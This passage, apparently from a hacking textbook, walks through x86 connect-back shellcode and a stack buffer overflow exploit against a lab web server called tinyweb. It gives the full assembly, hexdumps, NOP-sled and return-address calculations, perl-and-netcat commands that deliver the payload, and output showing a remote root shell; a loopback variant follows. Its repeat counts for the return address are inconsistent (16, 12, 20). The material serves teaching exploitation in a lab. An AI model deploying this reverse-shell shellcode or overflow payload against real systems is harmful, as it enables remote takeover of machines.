int 0x80 ; After syscall, eax has socket file descriptor.

xchg esi, eax ; Save socket FD in esi for later.

; connect(s, [2, 31337, <IP address>], 16)

push BYTE 0x66 ; socketcall (syscall #102)

pop eax

inc ebx ; ebx = 2 (needed for AF_INET)

push DWORD 0x482aa8c0 ; Build sockaddr struct: IP address = 192.168.42.72

push WORD 0x697a ; (in reverse order) PORT = 31337

push WORD bx ; AF_INET = 2

mov ecx, esp ; ecx = server struct pointer

push BYTE 16 ; argv: { sizeof(server struct) = 16,

push ecx ; server struct pointer,

push esi ; socket file descriptor }

mov ecx, esp ; ecx = argument array

inc ebx ; ebx = 3 = SYS_CONNECT = connect()

int 0x80 ; eax = connected socket FD

; dup2(connected socket, {all three standard I/O file descriptors})

xchg eax, ebx ; Put socket FD in ebx and 0x00000003 in eax.

push BYTE 0x2 ; ecx starts at 2.

pop ecx

dup_loop:

mov BYTE al, 0x3F ; dup2 syscall #63

int 0x80 ; dup2(c, 0)

dec ecx ; Count down to 0.

jns dup_loop ; If the sign flag is not set, ecx is not negative.

; execve(const char *filename, char *const argv [], char *const envp[])

mov BYTE al, 11 ; execve syscall #11.

push edx ; push some nulls for string termination.

push 0x68732f2f ; push "//sh" to the stack.

push 0x6e69622f ; push "/bin" to the stack.

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp.

push edx ; push 32-bit null terminator to stack.

mov edx, esp ; This is an empty array for envp.

push ebx ; push string addr to stack above null terminator.

mov ecx, esp ; This is the argv array with string ptr.

int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

In the shellcode above, the connection IP address is set to 192.168.42.72, which should be the IP address of the attacking machine. This address is stored in the in_addr structure as 0x482aa8c0, which is the hexadecimal representation of 72, 42, 168, and 192. This is made clear when each number is displayed in hexadecimal:

reader@hacking:~/booksrc $ gdb -q

(gdb) p /x 192

$1 = 0xc0

(gdb) p /x 168

$2 = 0xa8

(gdb) p /x 42

$3 = 0x2a

(gdb) p /x 72

$4 = 0x48

(gdb) p /x 31337

$5 = 0x7a69

(gdb)

Since these values are stored in network byte order but the x86 architecture is in little-endian order, the stored DWORD seems to be reversed. This means the DWORD for 192.168.42.72 is 0x482aa8c0. This also applies for the two-byte WORD used for the destination port. When the port number 31337 is printed in hexadecimal using gdb, the byte order is shown in little-endian order. This means the displayed bytes must be reversed, so WORD for 31337 is 0x697a.

The netcat program can also be used to listen for incoming connections with the -l command-line option. This is used in the output below to listen on port 31337 for the connect-back shellcode. The ifconfig command ensures the IP address of eth0 is 192.168.42.72 so the shellcode can connect back to it.

reader@hacking:~/booksrc $ sudo ifconfig eth0 192.168.42.72 up

reader@hacking:~/booksrc $ ifconfig eth0

eth0 Link encap:Ethernet HWaddr 00:01:6C:EB:1D:50

inet addr:192.168.42.72 Bcast:192.168.42.255 Mask:255.255.255.0

UP BROADCAST MULTICAST MTU:1500 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

Interrupt:16

reader@hacking:~/booksrc $ nc -v -l -p 31337

listening on [any] 31337 ...

Now, let's try to exploit the tinyweb server program using the connectback shellcode. From working with this program before, we know that the request buffer is 500 bytes long and is located at 0xbffff5c0 in stack memory. We also know that the return address is found within 40 bytes of the end of the buffer.

reader@hacking:~/booksrc $ nasm connectback_shell.s

reader@hacking:~/booksrc $ hexdump -C connectback_shell

00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|

00000010 96 6a 66 58 43 68 c0 a8 2a 48 66 68 7a 69 66 53 |.jfXCh..*HfhzifS|

00000020 89 e1 6a 10 51 56 89 e1 43 cd 80 87 f3 87 ce 49 |..j.QV..C......I|

00000030 b0 3f cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 |.?..Iy...Rh//shh|

00000040 2f 62 69 6e 89 e3 52 89 e2 53 89 e1 cd 80 |/bin..R..S....|

0000004e

reader@hacking:~/booksrc $ wc -c connectback_shell

78 connectback_shell

reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 78 ))

402

reader@hacking:~/booksrc $ gdb -q --batch -ex "p /x 0xbffff5c0 + 200"

$1 = 0xbffff688

reader@hacking:~/booksrc $

Since the offset from the beginning of the buffer to the return address is 540 bytes, a total of 544 bytes must be written to overwrite the four-byte return address. The return address overwrite also needs to be properly aligned, since the return address uses multiple bytes. To ensure proper alignment, the sumof the NOP sled and shellcode bytes must be divisible by four. In addition, the shellcode itself must stay within the first 500 bytes of the overwrite. These are the bounds of the response buffer, and the memory afterward corresponds to other values on the stack that might be written to before we change the program's control flow. Staying within these bounds avoids the risk of random overwrites to the shellcode, which inevitably lead to crashes. Repeating the return address 16 times will generate 64 bytes, which can be put at the end of the 544-byte exploit buffer and keeps the shellcode safely within the bounds of the buffer. The remaining bytes at the beginning of the exploit buffer will be the NOP sled. The calculations above show that a 402-byte NOP sled will properly align the 78-byte shellcode and place it safely within the bounds of the buffer. Repeating the desired return address 12 times spaces the final 4 bytes of the exploit buffer perfectly to overwrite the saved return address on the stack. Overwriting the return address with 0xbffff688 should return execution right to the middle of the NOP sled, while avoiding bytes near the beginning of the buffer, which might get mangled. These calculated values will be used in the following exploit, but first the connect-back shell needs some place to connect back to. In the output below, netcat is used to listen for incoming connections on port 31337.

reader@hacking:~/booksrc $ nc -v -l -p 31337

listening on [any] 31337 ...

Now, in another terminal, the calculated exploit values can be used to exploit the tinyweb program remotely.

From Another Terminal Window

reader@hacking:~/booksrc $ (perl -e 'print "\x90"x402';

> cat connectback_shell;

> perl -e 'print "\x88\xf6\xff\xbf"x20 . "\r\n"') | nc -v 127.0.0.1 80

localhost [127.0.0.1] 80 (www) open

Back in the original terminal, the shellcode has connected back to the netcat process listening on port 31337. This provides root shell access remotely.

reader@hacking:~/booksrc $ nc -v -l -p 31337

listening on [any] 31337 ...

connect to [192.168.42.72] from hacking.local [192.168.42.72] 34391

whoami

root

The network configuration for this example is slightly confusing because the attack is directed at 127.0.0.1 and the shellcode connects back to 192.168.42.72. Both of these IP addresses route to the same place, but 192.168.42.72 is easier to use in shellcode than 127.0.0.1. Since the loopback address contains two null bytes, the address must be built on the stack with multiple instructions. One way to do this is to write the two null bytes to the stack using a zeroed register. The file loopback_shell.s is a modified version of connectback_shell.s that uses the loopback address of 127.0.0.1. The differences are shown in the following output.

reader@hacking:~/booksrc $ diff connectback_shell.s loopback_shell.s

21c21,22

< push DWORD 0x482aa8c0 ; Build sockaddr struct: IP Address = 192.168.42.72

---

> push DWORD 0x01BBBB7f ; Build sockaddr struct: IP Address = 127.0.0.1

> mov WORD [esp+1], dx ; overwrite the BBBB with 0000 in the previous push

reader@hacking:~/booksrc $

After pushing the value 0x01BBBB7f to the stack, the ESP register will point to the beginning of this DWORD. By writing a two-byte WORD of null bytes at ESP+1, the middle two bytes will be overwritten to form the correct return address.

This additional instruction increases the size of the shellcode by a few bytes, which means the NOP sled also needs to be adjusted for the exploit buffer. These calculations are shown in the output below, and they result in a 397-byte NOP sled. This exploit using the loopback shellcode assumes that the tinyweb program is running and that a netcat process is listening for incoming connections on port 31337.

reader@hacking:~/booksrc $ nasm loopback_shell.s

reader@hacking:~/booksrc $ hexdump -C loopback_shell | grep --color=auto 00

00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|

00000010 96 6a 66 58 43 68 7f bb bb 01 66 89 54 24 01 66 |.jfXCh....f.T$.f|

00000020 68 7a 69 66 53 89 e1 6a 10 51 56 89 e1 43 cd 80 |hzifS..j.QV..C..|

00000030 87 f3 87 ce 49 b0 3f cd 80 49 79 f9 b0 0b 52 68 |....I.?..Iy...Rh|

00000040 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 89 e2 53 89 |//shh/bin..R..S.|

00000050 e1 cd 80 |...|

00000053

reader@hacking:~/booksrc $ wc -c loopback_shell

83 loopback_shell

reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 83 ))

397

reader@hacking:~/booksrc $ (perl -e 'print "\x90"x397';cat loopback_shell;perl -e 'print

"\x88\

xf6\xff\xbf"x16 . "\r\n"') | nc -v 127.0.0.1 80

localhost [127.0.0.1] 80 (www) open

As with the previous exploit, the terminal with netcat listening on port 31337 will receive the rootshell.

reader@hacking:~ $ nc -vlp 31337

listening on [any] 31337 ...

connect to [127.0.0.1] from localhost [127.0.0.1] 42406

whoami

root

It almost seems too easy, doesn't it?